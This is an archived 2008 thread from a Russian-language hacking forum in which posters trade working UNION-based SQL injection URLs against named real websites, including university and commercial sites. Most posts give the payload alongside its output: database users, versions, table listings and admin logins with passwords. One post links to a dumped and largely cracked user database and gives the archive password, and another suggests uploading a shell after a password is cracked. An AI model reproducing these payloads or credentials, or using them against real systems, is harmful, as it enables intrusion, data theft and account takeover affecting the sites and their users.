ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.01.2008, 10:04
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
народ a можно в подзапросах использовать update или insert
Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.
|
|
|
17.01.2008, 10:13
|
|
Новичок
Регистрация: 16.01.2008
Сообщений: 1
Провел на форуме:
29258
Репутация:
0
|
|
Сообщение от Saint-Sky
2 159932
Посмотрел robots, по идее должна быть в /admin/, но там нету...
Попробуй таблицы от форума. (phpbb_users) - Если подберешь пасс, то можешь залить шелл...
Код:
http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5+from+gurujen_forum.phpbb_users/*
Ольга:82e0839b64d121ef7154f2b8d5b27351: qween1Администрация Форума!
Ольга : qween1
|
|
|
|
17.01.2008, 11:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
Сообщение от The_HuliGun
Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.
update и в insert, select прокатывает
|
|
|
|
frugalreader.com что-то типа обменника книг для частников (SQL-inj + БД) |
17.01.2008, 14:47
|
|
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
Провел на форуме:
13936387
Репутация:
1844
|
|
frugalreader.com что-то типа обменника книг для частников (SQL-inj + БД)
SQL-inj:
Код:
http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn=
БД (расшифровано 4185 из 4613 (почти 91%)) паролей:
http://dinar007.by.ru/hbd/base_frugalreader.zip
Пароль к архиву: antichat.ru
|
|
|
|
17.01.2008, 17:02
|
|
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
Провел на форуме:
3295822
Репутация:
117
|
|
www.lrn.ru
Код:
http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),version()),2/*
lrn_ru@localhost:lrn_ru:5.0.46-log/2 (file_priv нет)
Код:
http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password),2+from+users+where+username+like+%22Vitls%22/*
установочный путь: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php
админка: http://www.lrn.ru/admin (как через нее залить шелл я не догнал)
Vitls:gjhextybt |
|
|
|
17.01.2008, 17:39
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7/*
alteregotutby@gemini.tutby.com:alteregotutby |
|
|
|
17.01.2008, 18:09
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
5.0.24a
climatea_climat@localhost
climatea_climat
усть доступ к schema , но я несмог найти админа |
|
|
|
17.01.2008, 19:00
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
channelg.tv
Код HTML:
http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54
channelg@localhost:4.0.24:channelg
Там CMS какая-то...
uginfo.sfedu.ru
Код HTML:
http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,null/**/
sgcs.fcm.unc.edu.ar
Код HTML:
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/
Код HTML:
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/
user - postgres
version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)
Код HTML:
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES/**/
- названия таблиц
Код HTML:
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS/**/
- названия колонок
|
|
|
|
17.01.2008, 22:24
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4/*
netlink_netltbn@localhost:netlink_netltbn:5.0.24a
Код:
http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/*
homelogin@localhost:homeopath:4.1.22
Последний раз редактировалось BizzyD; 17.01.2008 в 22:43..
|
|
|
|
18.01.2008, 00:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
сессия съела мой мозг :\
---
http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9/*
4.1.22-standard/chatman_chatman/chatman_u51279@localhost
-----------------------------------------------------------------------------
http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*
4.1.21/mmp/mmp@localhost
http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3, 4,5,6,7,8,9,10+from+users/*
логин/пароль
admin/mrkroz2909
--------------------------------------------------------------------------
А это аццкие специалисты сетевых технологий угрожают гнусным хакерам 
http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog& pid=-1+union+select+1/* |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
